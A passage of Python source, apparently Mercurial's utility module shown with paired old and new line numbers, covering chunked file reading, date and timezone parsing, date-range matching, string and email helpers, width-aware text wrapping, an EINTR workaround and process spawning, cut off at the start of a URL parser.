1896 1901 # Use full chunk.
1897 1902 if offset == 0 and left >= chunkl:
1898 1903 left -= chunkl
1899 1904 queue.popleft()
1900 1905 buf.append(chunk)
1901 1906 # self._chunkoffset remains at 0.
1902 1907 continue
1903 1908
1904 1909 chunkremaining = chunkl - offset
1905 1910
1906 1911 # Use all of unconsumed part of chunk.
1907 1912 if left >= chunkremaining:
1908 1913 left -= chunkremaining
1909 1914 queue.popleft()
1910 1915 # offset == 0 is enabled by block above, so this won't merely
1911 1916 # copy via ``chunk[0:]``.
1912 1917 buf.append(chunk[offset:])
1913 1918 self._chunkoffset = 0
1914 1919
1915 1920 # Partial chunk needed.
1916 1921 else:
1917 1922 buf.append(chunk[offset:offset + left])
1918 1923 self._chunkoffset += left
1919 1924 left -= chunkremaining
1920 1925
1921 1926 return ''.join(buf)
1922 1927
1923 1928 def filechunkiter(f, size=131072, limit=None):
1924 1929 """Create a generator that produces the data in the file size
1925 1930 (default 131072) bytes at a time, up to optional limit (default is
1926 1931 to read all data). Chunks may be less than size bytes if the
1927 1932 chunk is the last chunk in the file, or the file is a socket or
1928 1933 some other type of file that sometimes reads less data than is
1929 1934 requested."""
1930 1935 assert size >= 0
1931 1936 assert limit is None or limit >= 0
1932 1937 while True:
1933 1938 if limit is None:
1934 1939 nbytes = size
1935 1940 else:
1936 1941 nbytes = min(limit, size)
1937 1942 s = nbytes and f.read(nbytes)
1938 1943 if not s:
1939 1944 break
1940 1945 if limit:
1941 1946 limit -= len(s)
1942 1947 yield s
1943 1948
1944 1949 def makedate(timestamp=None):
1945 1950 '''Return a unix timestamp (or the current time) as a (unixtime,
1946 1951 offset) tuple based off the local timezone.'''
1947 1952 if timestamp is None:
1948 1953 timestamp = time.time()
1949 1954 if timestamp < 0:
1950 1955 hint = _("check your clock")
1951 1956 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1952 1957 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1953 1958 datetime.datetime.fromtimestamp(timestamp))
1954 1959 tz = delta.days * 86400 + delta.seconds
1955 1960 return timestamp, tz
1956 1961
1957 1962 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1958 1963 """represent a (unixtime, offset) tuple as a localized time.
1959 1964 unixtime is seconds since the epoch, and offset is the time zone's
1960 1965 number of seconds away from UTC.
1961 1966
1962 1967 >>> datestr((0, 0))
1963 1968 'Thu Jan 01 00:00:00 1970 +0000'
1964 1969 >>> datestr((42, 0))
1965 1970 'Thu Jan 01 00:00:42 1970 +0000'
1966 1971 >>> datestr((-42, 0))
1967 1972 'Wed Dec 31 23:59:18 1969 +0000'
1968 1973 >>> datestr((0x7fffffff, 0))
1969 1974 'Tue Jan 19 03:14:07 2038 +0000'
1970 1975 >>> datestr((-0x80000000, 0))
1971 1976 'Fri Dec 13 20:45:52 1901 +0000'
1972 1977 """
1973 1978 t, tz = date or makedate()
1974 1979 if "%1" in format or "%2" in format or "%z" in format:
1975 1980 sign = (tz > 0) and "-" or "+"
1976 1981 minutes = abs(tz) // 60
1977 1982 q, r = divmod(minutes, 60)
1978 1983 format = format.replace("%z", "%1%2")
1979 1984 format = format.replace("%1", "%c%02d" % (sign, q))
1980 1985 format = format.replace("%2", "%02d" % r)
1981 1986 d = t - tz
1982 1987 if d > 0x7fffffff:
1983 1988 d = 0x7fffffff
1984 1989 elif d < -0x80000000:
1985 1990 d = -0x80000000
1986 1991 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1987 1992 # because they use the gmtime() system call which is buggy on Windows
1988 1993 # for negative values.
1989 1994 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1990 1995 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1991 1996 return s
1992 1997
1993 1998 def shortdate(date=None):
1994 1999 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1995 2000 return datestr(date, format='%Y-%m-%d')
1996 2001
1997 2002 def parsetimezone(s):
1998 2003 """find a trailing timezone, if any, in string, and return a
1999 2004 (offset, remainder) pair"""
2000 2005
2001 2006 if s.endswith("GMT") or s.endswith("UTC"):
2002 2007 return 0, s[:-3].rstrip()
2003 2008
2004 2009 # Unix-style timezones [+-]hhmm
2005 2010 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2006 2011 sign = (s[-5] == "+") and 1 or -1
2007 2012 hours = int(s[-4:-2])
2008 2013 minutes = int(s[-2:])
2009 2014 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2010 2015
2011 2016 # ISO8601 trailing Z
2012 2017 if s.endswith("Z") and s[-2:-1].isdigit():
2013 2018 return 0, s[:-1]
2014 2019
2015 2020 # ISO8601-style [+-]hh:mm
2016 2021 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2017 2022 s[-5:-3].isdigit() and s[-2:].isdigit()):
2018 2023 sign = (s[-6] == "+") and 1 or -1
2019 2024 hours = int(s[-5:-3])
2020 2025 minutes = int(s[-2:])
2021 2026 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2022 2027
2023 2028 return None, s
2024 2029
2025 2030 def strdate(string, format, defaults=None):
2026 2031 """parse a localized time string and return a (unixtime, offset) tuple.
2027 2032 if the string cannot be parsed, ValueError is raised."""
2028 2033 if defaults is None:
2029 2034 defaults = {}
2030 2035
2031 2036 # NOTE: unixtime = localunixtime + offset
2032 2037 offset, date = parsetimezone(string)
2033 2038
2034 2039 # add missing elements from defaults
2035 2040 usenow = False # default to using biased defaults
2036 2041 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2037 2042 part = pycompat.bytestr(part)
2038 2043 found = [True for p in part if ("%"+p) in format]
2039 2044 if not found:
2040 2045 date += "@" + defaults[part][usenow]
2041 2046 format += "@%" + part[0]
2042 2047 else:
2043 2048 # We've found a specific time element, less specific time
2044 2049 # elements are relative to today
2045 2050 usenow = True
2046 2051
2047 2052 timetuple = time.strptime(encoding.strfromlocal(date),
2048 2053 encoding.strfromlocal(format))
2049 2054 localunixtime = int(calendar.timegm(timetuple))
2050 2055 if offset is None:
2051 2056 # local timezone
2052 2057 unixtime = int(time.mktime(timetuple))
2053 2058 offset = unixtime - localunixtime
2054 2059 else:
2055 2060 unixtime = localunixtime + offset
2056 2061 return unixtime, offset
2057 2062
2058 2063 def parsedate(date, formats=None, bias=None):
2059 2064 """parse a localized date/time and return a (unixtime, offset) tuple.
2060 2065
2061 2066 The date may be a "unixtime offset" string or in one of the specified
2062 2067 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2063 2068
2064 2069 >>> parsedate(b' today ') == parsedate(
2065 2070 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2066 2071 True
2067 2072 >>> parsedate(b'yesterday ') == parsedate(
2068 2073 ... (datetime.date.today() - datetime.timedelta(days=1)
2069 2074 ... ).strftime('%b %d').encode('ascii'))
2070 2075 True
2071 2076 >>> now, tz = makedate()
2072 2077 >>> strnow, strtz = parsedate(b'now')
2073 2078 >>> (strnow - now) < 1
2074 2079 True
2075 2080 >>> tz == strtz
2076 2081 True
2077 2082 """
2078 2083 if bias is None:
2079 2084 bias = {}
2080 2085 if not date:
2081 2086 return 0, 0
2082 2087 if isinstance(date, tuple) and len(date) == 2:
2083 2088 return date
2084 2089 if not formats:
2085 2090 formats = defaultdateformats
2086 2091 date = date.strip()
2087 2092
2088 2093 if date == 'now' or date == _('now'):
2089 2094 return makedate()
2090 2095 if date == 'today' or date == _('today'):
2091 2096 date = datetime.date.today().strftime(r'%b %d')
2092 2097 date = encoding.strtolocal(date)
2093 2098 elif date == 'yesterday' or date == _('yesterday'):
2094 2099 date = (datetime.date.today() -
2095 2100 datetime.timedelta(days=1)).strftime(r'%b %d')
2096 2101 date = encoding.strtolocal(date)
2097 2102
2098 2103 try:
2099 2104 when, offset = map(int, date.split(' '))
2100 2105 except ValueError:
2101 2106 # fill out defaults
2102 2107 now = makedate()
2103 2108 defaults = {}
2104 2109 for part in ("d", "mb", "yY", "HI", "M", "S"):
2105 2110 # this piece is for rounding the specific end of unknowns
2106 2111 b = bias.get(part)
2107 2112 if b is None:
2108 2113 if part[0:1] in "HMS":
2109 2114 b = "00"
2110 2115 else:
2111 2116 b = "0"
2112 2117
2113 2118 # this piece is for matching the generic end to today's date
2114 2119 n = datestr(now, "%" + part[0:1])
2115 2120
2116 2121 defaults[part] = (b, n)
2117 2122
2118 2123 for format in formats:
2119 2124 try:
2120 2125 when, offset = strdate(date, format, defaults)
2121 2126 except (ValueError, OverflowError):
2122 2127 pass
2123 2128 else:
2124 2129 break
2125 2130 else:
2126 2131 raise error.ParseError(_('invalid date: %r') % date)
2127 2132 # validate explicit (probably user-specified) date and
2128 2133 # time zone offset. values must fit in signed 32 bits for
2129 2134 # current 32-bit linux runtimes. timezones go from UTC-12
2130 2135 # to UTC+14
2131 2136 if when < -0x80000000 or when > 0x7fffffff:
2132 2137 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2133 2138 if offset < -50400 or offset > 43200:
2134 2139 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2135 2140 return when, offset
2136 2141
2137 2142 def matchdate(date):
2138 2143 """Return a function that matches a given date match specifier
2139 2144
2140 2145 Formats include:
2141 2146
2142 2147 '{date}' match a given date to the accuracy provided
2143 2148
2144 2149 '<{date}' on or before a given date
2145 2150
2146 2151 '>{date}' on or after a given date
2147 2152
2148 2153 >>> p1 = parsedate(b"10:29:59")
2149 2154 >>> p2 = parsedate(b"10:30:00")
2150 2155 >>> p3 = parsedate(b"10:30:59")
2151 2156 >>> p4 = parsedate(b"10:31:00")
2152 2157 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2153 2158 >>> f = matchdate(b"10:30")
2154 2159 >>> f(p1[0])
2155 2160 False
2156 2161 >>> f(p2[0])
2157 2162 True
2158 2163 >>> f(p3[0])
2159 2164 True
2160 2165 >>> f(p4[0])
2161 2166 False
2162 2167 >>> f(p5[0])
2163 2168 False
2164 2169 """
2165 2170
2166 2171 def lower(date):
2167 2172 d = {'mb': "1", 'd': "1"}
2168 2173 return parsedate(date, extendeddateformats, d)[0]
2169 2174
2170 2175 def upper(date):
2171 2176 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2172 2177 for days in ("31", "30", "29"):
2173 2178 try:
2174 2179 d["d"] = days
2175 2180 return parsedate(date, extendeddateformats, d)[0]
2176 2181 except Abort:
2177 2182 pass
2178 2183 d["d"] = "28"
2179 2184 return parsedate(date, extendeddateformats, d)[0]
2180 2185
2181 2186 date = date.strip()
2182 2187
2183 2188 if not date:
2184 2189 raise Abort(_("dates cannot consist entirely of whitespace"))
2185 2190 elif date[0] == "<":
2186 2191 if not date[1:]:
2187 2192 raise Abort(_("invalid day spec, use '<DATE'"))
2188 2193 when = upper(date[1:])
2189 2194 return lambda x: x <= when
2190 2195 elif date[0] == ">":
2191 2196 if not date[1:]:
2192 2197 raise Abort(_("invalid day spec, use '>DATE'"))
2193 2198 when = lower(date[1:])
2194 2199 return lambda x: x >= when
2195 2200 elif date[0] == "-":
2196 2201 try:
2197 2202 days = int(date[1:])
2198 2203 except ValueError:
2199 2204 raise Abort(_("invalid day spec: %s") % date[1:])
2200 2205 if days < 0:
2201 2206 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2202 2207 % date[1:])
2203 2208 when = makedate()[0] - days * 3600 * 24
2204 2209 return lambda x: x >= when
2205 2210 elif " to " in date:
2206 2211 a, b = date.split(" to ")
2207 2212 start, stop = lower(a), upper(b)
2208 2213 return lambda x: x >= start and x <= stop
2209 2214 else:
2210 2215 start, stop = lower(date), upper(date)
2211 2216 return lambda x: x >= start and x <= stop
2212 2217
2213 2218 def stringmatcher(pattern, casesensitive=True):
2214 2219 """
2215 2220 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2216 2221 returns the matcher name, pattern, and matcher function.
2217 2222 missing or unknown prefixes are treated as literal matches.
2218 2223
2219 2224 helper for tests:
2220 2225 >>> def test(pattern, *tests):
2221 2226 ... kind, pattern, matcher = stringmatcher(pattern)
2222 2227 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2223 2228 >>> def itest(pattern, *tests):
2224 2229 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2225 2230 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2226 2231
2227 2232 exact matching (no prefix):
2228 2233 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2229 2234 ('literal', 'abcdefg', [False, False, True])
2230 2235
2231 2236 regex matching ('re:' prefix)
2232 2237 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2233 2238 ('re', 'a.+b', [False, False, True])
2234 2239
2235 2240 force exact matches ('literal:' prefix)
2236 2241 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2237 2242 ('literal', 're:foobar', [False, True])
2238 2243
2239 2244 unknown prefixes are ignored and treated as literals
2240 2245 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2241 2246 ('literal', 'foo:bar', [False, False, True])
2242 2247
2243 2248 case insensitive regex matches
2244 2249 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2245 2250 ('re', 'A.+b', [False, False, True])
2246 2251
2247 2252 case insensitive literal matches
2248 2253 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2249 2254 ('literal', 'ABCDEFG', [False, False, True])
2250 2255 """
2251 2256 if pattern.startswith('re:'):
2252 2257 pattern = pattern[3:]
2253 2258 try:
2254 2259 flags = 0
2255 2260 if not casesensitive:
2256 2261 flags = remod.I
2257 2262 regex = remod.compile(pattern, flags)
2258 2263 except remod.error as e:
2259 2264 raise error.ParseError(_('invalid regular expression: %s')
2260 2265 % e)
2261 2266 return 're', pattern, regex.search
2262 2267 elif pattern.startswith('literal:'):
2263 2268 pattern = pattern[8:]
2264 2269
2265 2270 match = pattern.__eq__
2266 2271
2267 2272 if not casesensitive:
2268 2273 ipat = encoding.lower(pattern)
2269 2274 match = lambda s: ipat == encoding.lower(s)
2270 2275 return 'literal', pattern, match
2271 2276
2272 2277 def shortuser(user):
2273 2278 """Return a short representation of a user name or email address."""
2274 2279 f = user.find('@')
2275 2280 if f >= 0:
2276 2281 user = user[:f]
2277 2282 f = user.find('<')
2278 2283 if f >= 0:
2279 2284 user = user[f + 1:]
2280 2285 f = user.find(' ')
2281 2286 if f >= 0:
2282 2287 user = user[:f]
2283 2288 f = user.find('.')
2284 2289 if f >= 0:
2285 2290 user = user[:f]
2286 2291 return user
2287 2292
2288 2293 def emailuser(user):
2289 2294 """Return the user portion of an email address."""
2290 2295 f = user.find('@')
2291 2296 if f >= 0:
2292 2297 user = user[:f]
2293 2298 f = user.find('<')
2294 2299 if f >= 0:
2295 2300 user = user[f + 1:]
2296 2301 return user
2297 2302
2298 2303 def email(author):
2299 2304 '''get email of author.'''
2300 2305 r = author.find('>')
2301 2306 if r == -1:
2302 2307 r = None
2303 2308 return author[author.find('<') + 1:r]
2304 2309
2305 2310 def ellipsis(text, maxlength=400):
2306 2311 """Trim string to at most maxlength (default: 400) columns in display."""
2307 2312 return encoding.trim(text, maxlength, ellipsis='...')
2308 2313
2309 2314 def unitcountfn(*unittable):
2310 2315 '''return a function that renders a readable count of some quantity'''
2311 2316
2312 2317 def go(count):
2313 2318 for multiplier, divisor, format in unittable:
2314 2319 if abs(count) >= divisor * multiplier:
2315 2320 return format % (count / float(divisor))
2316 2321 return unittable[-1][2] % count
2317 2322
2318 2323 return go
2319 2324
2320 2325 def processlinerange(fromline, toline):
2321 2326 """Check that linerange <fromline>:<toline> makes sense and return a
2322 2327 0-based range.
2323 2328
2324 2329 >>> processlinerange(10, 20)
2325 2330 (9, 20)
2326 2331 >>> processlinerange(2, 1)
2327 2332 Traceback (most recent call last):
2328 2333 ...
2329 2334 ParseError: line range must be positive
2330 2335 >>> processlinerange(0, 5)
2331 2336 Traceback (most recent call last):
2332 2337 ...
2333 2338 ParseError: fromline must be strictly positive
2334 2339 """
2335 2340 if toline - fromline < 0:
2336 2341 raise error.ParseError(_("line range must be positive"))
2337 2342 if fromline < 1:
2338 2343 raise error.ParseError(_("fromline must be strictly positive"))
2339 2344 return fromline - 1, toline
2340 2345
2341 2346 bytecount = unitcountfn(
2342 2347 (100, 1 << 30, _('%.0f GB')),
2343 2348 (10, 1 << 30, _('%.1f GB')),
2344 2349 (1, 1 << 30, _('%.2f GB')),
2345 2350 (100, 1 << 20, _('%.0f MB')),
2346 2351 (10, 1 << 20, _('%.1f MB')),
2347 2352 (1, 1 << 20, _('%.2f MB')),
2348 2353 (100, 1 << 10, _('%.0f KB')),
2349 2354 (10, 1 << 10, _('%.1f KB')),
2350 2355 (1, 1 << 10, _('%.2f KB')),
2351 2356 (1, 1, _('%.0f bytes')),
2352 2357 )
2353 2358
2354 2359 # Matches a single EOL which can either be a CRLF where repeated CR
2355 2360 # are removed or a LF. We do not care about old Macintosh files, so a
2356 2361 # stray CR is an error.
2357 2362 _eolre = remod.compile(br'\r*\n')
2358 2363
2359 2364 def tolf(s):
2360 2365 return _eolre.sub('\n', s)
2361 2366
2362 2367 def tocrlf(s):
2363 2368 return _eolre.sub('\r\n', s)
2364 2369
2365 2370 if pycompat.oslinesep == '\r\n':
2366 2371 tonativeeol = tocrlf
2367 2372 fromnativeeol = tolf
2368 2373 else:
2369 2374 tonativeeol = pycompat.identity
2370 2375 fromnativeeol = pycompat.identity
2371 2376
2372 2377 def escapestr(s):
2373 2378 # call underlying function of s.encode('string_escape') directly for
2374 2379 # Python 3 compatibility
2375 2380 return codecs.escape_encode(s)[0]
2376 2381
2377 2382 def unescapestr(s):
2378 2383 return codecs.escape_decode(s)[0]
2379 2384
2380 2385 def forcebytestr(obj):
2381 2386 """Portably format an arbitrary object (e.g. exception) into a byte
2382 2387 string."""
2383 2388 try:
2384 2389 return pycompat.bytestr(obj)
2385 2390 except UnicodeEncodeError:
2386 2391 # non-ascii string, may be lossy
2387 2392 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2388 2393
2389 2394 def uirepr(s):
2390 2395 # Avoid double backslash in Windows path repr()
2391 2396 return repr(s).replace('\\\\', '\\')
2392 2397
2393 2398 # delay import of textwrap
2394 2399 def MBTextWrapper(**kwargs):
2395 2400 class tw(textwrap.TextWrapper):
2396 2401 """
2397 2402 Extend TextWrapper for width-awareness.
2398 2403
2399 2404 Neither number of 'bytes' in any encoding nor 'characters' is
2400 2405 appropriate to calculate terminal columns for specified string.
2401 2406
2402 2407 Original TextWrapper implementation uses built-in 'len()' directly,
2403 2408 so overriding is needed to use width information of each characters.
2404 2409
2405 2410 In addition, characters classified into 'ambiguous' width are
2406 2411 treated as wide in East Asian area, but as narrow in other.
2407 2412
2408 2413 This requires use decision to determine width of such characters.
2409 2414 """
2410 2415 def _cutdown(self, ucstr, space_left):
2411 2416 l = 0
2412 2417 colwidth = encoding.ucolwidth
2413 2418 for i in xrange(len(ucstr)):
2414 2419 l += colwidth(ucstr[i])
2415 2420 if space_left < l:
2416 2421 return (ucstr[:i], ucstr[i:])
2417 2422 return ucstr, ''
2418 2423
2419 2424 # overriding of base class
2420 2425 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2421 2426 space_left = max(width - cur_len, 1)
2422 2427
2423 2428 if self.break_long_words:
2424 2429 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2425 2430 cur_line.append(cut)
2426 2431 reversed_chunks[-1] = res
2427 2432 elif not cur_line:
2428 2433 cur_line.append(reversed_chunks.pop())
2429 2434
2430 2435 # this overriding code is imported from TextWrapper of Python 2.6
2431 2436 # to calculate columns of string by 'encoding.ucolwidth()'
2432 2437 def _wrap_chunks(self, chunks):
2433 2438 colwidth = encoding.ucolwidth
2434 2439
2435 2440 lines = []
2436 2441 if self.width <= 0:
2437 2442 raise ValueError("invalid width %r (must be > 0)" % self.width)
2438 2443
2439 2444 # Arrange in reverse order so items can be efficiently popped
2440 2445 # from a stack of chucks.
2441 2446 chunks.reverse()
2442 2447
2443 2448 while chunks:
2444 2449
2445 2450 # Start the list of chunks that will make up the current line.
2446 2451 # cur_len is just the length of all the chunks in cur_line.
2447 2452 cur_line = []
2448 2453 cur_len = 0
2449 2454
2450 2455 # Figure out which static string will prefix this line.
2451 2456 if lines:
2452 2457 indent = self.subsequent_indent
2453 2458 else:
2454 2459 indent = self.initial_indent
2455 2460
2456 2461 # Maximum width for this line.
2457 2462 width = self.width - len(indent)
2458 2463
2459 2464 # First chunk on line is whitespace -- drop it, unless this
2460 2465 # is the very beginning of the text (i.e. no lines started yet).
2461 2466 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2462 2467 del chunks[-1]
2463 2468
2464 2469 while chunks:
2465 2470 l = colwidth(chunks[-1])
2466 2471
2467 2472 # Can at least squeeze this chunk onto the current line.
2468 2473 if cur_len + l <= width:
2469 2474 cur_line.append(chunks.pop())
2470 2475 cur_len += l
2471 2476
2472 2477 # Nope, this line is full.
2473 2478 else:
2474 2479 break
2475 2480
2476 2481 # The current line is full, and the next chunk is too big to
2477 2482 # fit on *any* line (not just this one).
2478 2483 if chunks and colwidth(chunks[-1]) > width:
2479 2484 self._handle_long_word(chunks, cur_line, cur_len, width)
2480 2485
2481 2486 # If the last chunk on this line is all whitespace, drop it.
2482 2487 if (self.drop_whitespace and
2483 2488 cur_line and cur_line[-1].strip() == r''):
2484 2489 del cur_line[-1]
2485 2490
2486 2491 # Convert current line back to a string and store it in list
2487 2492 # of all lines (return value).
2488 2493 if cur_line:
2489 2494 lines.append(indent + r''.join(cur_line))
2490 2495
2491 2496 return lines
2492 2497
2493 2498 global MBTextWrapper
2494 2499 MBTextWrapper = tw
2495 2500 return tw(**kwargs)
2496 2501
2497 2502 def wrap(line, width, initindent='', hangindent=''):
2498 2503 maxindent = max(len(hangindent), len(initindent))
2499 2504 if width <= maxindent:
2500 2505 # adjust for weird terminal size
2501 2506 width = max(78, maxindent + 1)
2502 2507 line = line.decode(pycompat.sysstr(encoding.encoding),
2503 2508 pycompat.sysstr(encoding.encodingmode))
2504 2509 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2505 2510 pycompat.sysstr(encoding.encodingmode))
2506 2511 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2507 2512 pycompat.sysstr(encoding.encodingmode))
2508 2513 wrapper = MBTextWrapper(width=width,
2509 2514 initial_indent=initindent,
2510 2515 subsequent_indent=hangindent)
2511 2516 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2512 2517
2513 2518 if (pyplatform.python_implementation() == 'CPython' and
2514 2519 sys.version_info < (3, 0)):
2515 2520 # There is an issue in CPython that some IO methods do not handle EINTR
2516 2521 # correctly. The following table shows what CPython version (and functions)
2517 2522 # are affected (buggy: has the EINTR bug, okay: otherwise):
2518 2523 #
2519 2524 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2520 2525 # --------------------------------------------------
2521 2526 # fp.__iter__ | buggy | buggy | okay
2522 2527 # fp.read* | buggy | okay [1] | okay
2523 2528 #
2524 2529 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2525 2530 #
2526 2531 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2527 2532 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2528 2533 #
2529 2534 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2530 2535 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2531 2536 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2532 2537 # fp.__iter__ but not other fp.read* methods.
2533 2538 #
2534 2539 # On modern systems like Linux, the "read" syscall cannot be interrupted
2535 2540 # when reading "fast" files like on-disk files. So the EINTR issue only
2536 2541 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2537 2542 # files approximately as "fast" files and use the fast (unsafe) code path,
2538 2543 # to minimize the performance impact.
2539 2544 if sys.version_info >= (2, 7, 4):
2540 2545 # fp.readline deals with EINTR correctly, use it as a workaround.
2541 2546 def _safeiterfile(fp):
2542 2547 return iter(fp.readline, '')
2543 2548 else:
2544 2549 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2545 2550 # note: this may block longer than necessary because of bufsize.
2546 2551 def _safeiterfile(fp, bufsize=4096):
2547 2552 fd = fp.fileno()
2548 2553 line = ''
2549 2554 while True:
2550 2555 try:
2551 2556 buf = os.read(fd, bufsize)
2552 2557 except OSError as ex:
2553 2558 # os.read only raises EINTR before any data is read
2554 2559 if ex.errno == errno.EINTR:
2555 2560 continue
2556 2561 else:
2557 2562 raise
2558 2563 line += buf
2559 2564 if '\n' in buf:
2560 2565 splitted = line.splitlines(True)
2561 2566 line = ''
2562 2567 for l in splitted:
2563 2568 if l[-1] == '\n':
2564 2569 yield l
2565 2570 else:
2566 2571 line = l
2567 2572 if not buf:
2568 2573 break
2569 2574 if line:
2570 2575 yield line
2571 2576
2572 2577 def iterfile(fp):
2573 2578 fastpath = True
2574 2579 if type(fp) is file:
2575 2580 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2576 2581 if fastpath:
2577 2582 return fp
2578 2583 else:
2579 2584 return _safeiterfile(fp)
2580 2585 else:
2581 2586 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2582 2587 def iterfile(fp):
2583 2588 return fp
2584 2589
2585 2590 def iterlines(iterator):
2586 2591 for chunk in iterator:
2587 2592 for line in chunk.splitlines():
2588 2593 yield line
2589 2594
2590 2595 def expandpath(path):
2591 2596 return os.path.expanduser(os.path.expandvars(path))
2592 2597
2593 2598 def hgcmd():
2594 2599 """Return the command used to execute current hg
2595 2600
2596 2601 This is different from hgexecutable() because on Windows we want
2597 2602 to avoid things opening new shell windows like batch files, so we
2598 2603 get either the python call or current executable.
2599 2604 """
2600 2605 if mainfrozen():
2601 2606 if getattr(sys, 'frozen', None) == 'macosx_app':
2602 2607 # Env variable set by py2app
2603 2608 return [encoding.environ['EXECUTABLEPATH']]
2604 2609 else:
2605 2610 return [pycompat.sysexecutable]
2606 2611 return gethgcmd()
2607 2612
2608 2613 def rundetached(args, condfn):
2609 2614 """Execute the argument list in a detached process.
2610 2615
2611 2616 condfn is a callable which is called repeatedly and should return
2612 2617 True once the child process is known to have started successfully.
2613 2618 At this point, the child process PID is returned. If the child
2614 2619 process fails to start or finishes before condfn() evaluates to
2615 2620 True, return -1.
2616 2621 """
2617 2622 # Windows case is easier because the child process is either
2618 2623 # successfully starting and validating the condition or exiting
2619 2624 # on failure. We just poll on its PID. On Unix, if the child
2620 2625 # process fails to start, it will be left in a zombie state until
2621 2626 # the parent wait on it, which we cannot do since we expect a long
2622 2627 # running process on success. Instead we listen for SIGCHLD telling
2623 2628 # us our child process terminated.
2624 2629 terminated = set()
2625 2630 def handler(signum, frame):
2626 2631 terminated.add(os.wait())
2627 2632 prevhandler = None
2628 2633 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2629 2634 if SIGCHLD is not None:
2630 2635 prevhandler = signal.signal(SIGCHLD, handler)
2631 2636 try:
2632 2637 pid = spawndetached(args)
2633 2638 while not condfn():
2634 2639 if ((pid in terminated or not testpid(pid))
2635 2640 and not condfn()):
2636 2641 return -1
2637 2642 time.sleep(0.1)
2638 2643 return pid
2639 2644 finally:
2640 2645 if prevhandler is not None:
2641 2646 signal.signal(signal.SIGCHLD, prevhandler)
2642 2647
2643 2648 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2644 2649 """Return the result of interpolating items in the mapping into string s.
2645 2650
2646 2651 prefix is a single character string, or a two character string with
2647 2652 a backslash as the first character if the prefix needs to be escaped in
2648 2653 a regular expression.
2649 2654
2650 2655 fn is an optional function that will be applied to the replacement text
2651 2656 just before replacement.
2652 2657
2653 2658 escape_prefix is an optional flag that allows using doubled prefix for
2654 2659 its escaping.
2655 2660 """
2656 2661 fn = fn or (lambda s: s)
2657 2662 patterns = '|'.join(mapping.keys())
2658 2663 if escape_prefix:
2659 2664 patterns += '|' + prefix
2660 2665 if len(prefix) > 1:
2661 2666 prefix_char = prefix[1:]
2662 2667 else:
2663 2668 prefix_char = prefix
2664 2669 mapping[prefix_char] = prefix_char
2665 2670 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2666 2671 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2667 2672
2668 2673 def getport(port):
2669 2674 """Return the port for a given network service.
2670 2675
2671 2676 If port is an integer, it's returned as is. If it's a string, it's
2672 2677 looked up using socket.getservbyname(). If there's no matching
2673 2678 service, error.Abort is raised.
2674 2679 """
2675 2680 try:
2676 2681 return int(port)
2677 2682 except ValueError:
2678 2683 pass
2679 2684
2680 2685 try:
2681 2686 return socket.getservbyname(port)
2682 2687 except socket.error:
2683 2688 raise Abort(_("no port number associated with service '%s'") % port)
2684 2689
2685 2690 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2686 2691 '0': False, 'no': False, 'false': False, 'off': False,
2687 2692 'never': False}
2688 2693
2689 2694 def parsebool(s):
2690 2695 """Parse s into a boolean.
2691 2696
2692 2697 If s is not a valid boolean, returns None.
2693 2698 """
2694 2699 return _booleans.get(s.lower(), None)
2695 2700
2696 2701 _hextochr = dict((a + b, chr(int(a + b, 16)))
2697 2702 for a in string.hexdigits for b in string.hexdigits)
2698 2703
2699 2704 class url(object):
2700 2705 r"""Reliable URL parser.
2701 2706
2702 2707 This parses URLs and provides attributes for the following
2703 2708 components:
2704 2709
2705 2710 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2706 2711
2707 2712 Missing components are set to None. The only exception is
2708 2713 fragment, which is set to '' if present but empty.
2709 2714
